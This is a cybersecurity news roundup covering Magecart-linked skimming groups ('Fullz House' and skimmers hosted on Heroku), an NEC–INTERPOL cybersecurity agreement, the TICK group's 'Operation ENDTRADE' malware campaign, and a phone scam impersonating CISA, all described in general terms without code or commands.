A group affiliated with the Magecart attacks has jumped from phishing to card skimming. The group, dubbed "Fullz House," sells packages of individuals' identifying information (known as "fullz") on its BlueMagicStore site. The group also uses skimming to sell payment card information on its carding store called CardHouse. Fullz House isn't new to the cybercriminal world but it ramped up its activities beginning in August-September. While the two parts of this group's operation are mainly split, there is a slight overlap in its attack infrastructure on domain-to-IP address resolution data. The sales platforms this group operates also have infrastructure overlap with the infrastructure tied to the group's operations that steal cards or payment credentials. RiskIQ has published its analysis of Fullz House. Magecart is not a specific entity but a bunch of splinter groups that all use the same tactics to compromise ecommerce sites and inject scripts to steal payment card data.
Malwarebytes spotted a number of skimmers found on Heroku, a container-based, cloud Platform as a Service that is owned by Salesforce. Magecart threat actors are leveraging the service to host their skimmer infrastructure and collect stolen credit card data. Developers can use Heroku to build apps in a variety of languages and deploy them seamlessly at scale. The Magecart thieves were registering free accounts with Heroku to host their skimming business. After notifying Salesforce of the Magecart activity, the instances were removed.
NEC has concluded a global cybersecurity agreement with the International Criminal Police Organization (INTERPOL). This partnership replaces an existing agreement by combining INTERPOL's international network with NEC cybersecurity technology to "assist the investigation and analysis of complex and sophisticated cybercrime" in addition to "strengthening security at an international level."
The TICK (also known as BRONZE BUTLER AND REDBALDKNIGHT) threat group has increased its malware development deployments since November 2018. TICK, which has been active since 2008, developing new malware families capable of detection evasion for initial intrusion, as well as escalation of administrative privileges for subsequent attacks and data collection. The group is using legitimate email accounts and credentials for the delivery of the malware, zeroing in on industries with highly classified information: defense, aerospace, chemical, and satellite industries with head offices in Japan and subsidiaries in China. Trend Micro is calling this campaign "Operation ENDTRADE." Further details are available from a white paper published by the vendor.
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of a phone scam where a caller pretends to be a CISA representative. The scammer claims to have knowledge of the potential victim's questionable behavior and attempts to extort money. CISA advises anyone who receives such a call not to pay any money and to contact a local FBI field office to file a report.